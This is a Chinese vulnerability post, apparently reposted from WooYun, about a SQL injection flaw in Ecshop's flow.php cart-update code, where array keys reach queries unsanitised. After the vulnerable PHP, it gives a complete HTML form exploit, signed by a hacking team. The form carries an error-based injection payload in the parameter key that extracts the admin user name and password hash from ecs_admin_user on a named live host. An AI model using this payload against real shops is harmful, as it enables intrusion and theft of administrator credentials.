Ecshop存在诸多SQL注射漏洞--flow.php

from:http://www.wooyun.org/bugs/wooyun-2012-011066

详细说明:

flow.php
[php]
elseif ($_REQUEST['step'] == 'update_cart')
{
if (isset($_POST['goods_number']) && is_array($_POST['goods_number']))
{
flow_update_cart($_POST['goods_number']);
}
show_message($_LANG['update_cart_notice'], $_LANG['back_to_cart'], 'flow.php');
exit;
}
[/php]

[php]
function flow_update_cart($arr)
{
/* 处理 */
foreach ($arr AS $key => $val)
{
$val = intval(make_semiangle($val));
if ($val <= 0 && !is_numeric($key))
{
continue;
}
//查询:
$sql = "SELECT `goods_id`, `goods_attr_id`, `product_id`, `extension_code` FROM" .$GLOBALS['ecs']->table('cart').
" WHERE rec_id='$key' AND session_id='" . SESS_ID . "'";
$goods = $GLOBALS['db']->getRow($sql);

$sql = "SELECT g.goods_name, g.goods_number ".
"FROM " .$GLOBALS['ecs']->table('goods'). " AS g, ".
$GLOBALS['ecs']->table('cart'). " AS c ".
"WHERE g.goods_id = c.goods_id AND c.rec_id = '$key'";
$row = $GLOBALS['db']->getRow($sql);
//查询:系统启用了库存,检查输入的商品数量是否有效
if (intval($GLOBALS['_CFG']['use_storage']) > 0 && $goods['extension_code'] != 'package_buy')
{
if ($row['goods_number'] < $val)
{
show_message(sprintf($GLOBALS['_LANG']['stock_insufficiency'], $row['goods_name'],
$row['goods_number'], $row['goods_number']));
exit;
}
/* 是货品 */
$goods['product_id'] = trim($goods['product_id']);
if (!empty($goods['product_id']))
{[/php]
仅仅全局对数组的值有处理但是没有对key处理造成漏洞

[php]<form name="myform" method="post" action="http://yezi.us/flow.php?step=update_cart" enctype="multipart/form-data">
<input type="text" name="goods_number[-1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,user_name,0x7c,password,0x27,0x7e)) from ecs_admin_user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)# and '1'='1]" value="21aaa">
<input type="submit" value="Do it"><br>
Ecshop SQL Injection Exp [4 Fucker Team]
</form>[/php]

有个坑爹吐血的事情~

原来小明同学10年已经叼了这洞了

http://www.myhack58.com/Article/html/3/62/2010/26956.htm

发表评论